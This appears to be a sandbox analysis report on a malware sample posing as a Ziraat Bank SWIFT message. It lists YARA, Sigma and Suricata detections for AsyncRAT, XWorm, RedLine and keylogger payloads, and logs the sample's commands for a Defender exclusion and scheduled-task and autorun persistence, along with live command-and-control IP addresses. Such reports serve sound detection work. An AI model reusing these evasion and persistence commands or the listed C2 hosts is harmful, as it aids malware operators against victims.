14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d31:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1cf8d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12dce:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d02a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12ee3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1d13f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1 0x128c3:$cnc4: POST / HTTP/1.1 0x1cb1f:$cnc4: POST / HTTP/1.1
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.2.XClient.exe.1d380000.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1
8.2.XClient.exe.1d020000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.XClient.exe.1d020000.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.XClient.exe.1d020000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ced:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x687f:$cnc4: POST / HTTP/1.1
14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d49:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12de6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12efb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1 0x128db:$cnc4: POST / HTTP/1.1
8.2.XClient.exe.1d380000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.4246bf0.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d49:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12de6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12efb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1 0x128db:$cnc4: POST / HTTP/1.1
0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.XClient.exe.1cbe0000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.XClient.exe.1cbe0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.XClient.exe.1cbe0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.XClient.exe.1cbe0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
8.2.XClient.exe.1cbe0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
9.0.build.exe.590000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41b07a0.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.41fb9d0.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d31:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1cf8d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12dce:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d02a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12ee3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1d13f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1 0x128c3:$cnc4: POST / HTTP/1.1 0x1cb1f:$cnc4: POST / HTTP/1.1
8.2.XClient.exe.1cbe0000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.XClient.exe.1cbe0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.XClient.exe.1cbe0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.XClient.exe.1cbe0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
8.2.XClient.exe.1cbe0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1361d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b1b:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e29:$a4: \Orbitum\User Data\Default\Login Data 0x13c21:$a5: \Kometa\User Data\Default\Login Data
8.2.XClient.exe.2ce4f08.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.2.XClient.exe.2ce4f08.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.XClient.exe.2ce4f08.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.XClient.exe.2ce4f08.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.XClient.exe.2ce4f08.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aed:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b8a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c9f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x867f:$cnc4: POST / HTTP/1.1
Click to see the 57 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ParentProcessId: 5600, ParentProcessName: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", ProcessId: 4448, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 2604, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 2604, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe, ParentImage: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe, ParentProcessId: 892, ParentProcessName: YkxAHNcqEmoeLS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp", ProcessId: 4012, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, Initiated: true, ProcessId: 2604, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49741

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ParentProcessId: 5600, ParentProcessName: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", ProcessId: 7064, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ParentProcessId: 5600, ParentProcessName: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe", ProcessId: 4448, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ParentProcessId: 5600, ParentProcessName: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp", ProcessId: 7064, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:20.082141+0100	2043234	1	A Network Trojan was detected	212.162.149.53	36014	192.168.2.5	49707	TCP
2024-11-26T09:01:31.227963+0100	2043234	1	A Network Trojan was detected	212.162.149.53	36014	192.168.2.5	49734	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T09:01:16.683212+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:25.269085+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:28.487260+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:29.235341+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:30.772529+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:36.249348+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:37.526601+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:38.499713+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:39.530589+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:39.896632+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:40.346836+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:40.569564+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:41.423077+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:41.812484+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:42.583965+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:43.100875+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:43.563814+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:44.198812+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:44.923125+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:44.931572+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:45.337776+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:45.413568+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.050948+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.465474+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.774347+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:47.772433+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:47.777165+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:48.127639+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:48.143931+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49734	212.162.149.53	36014	TCP
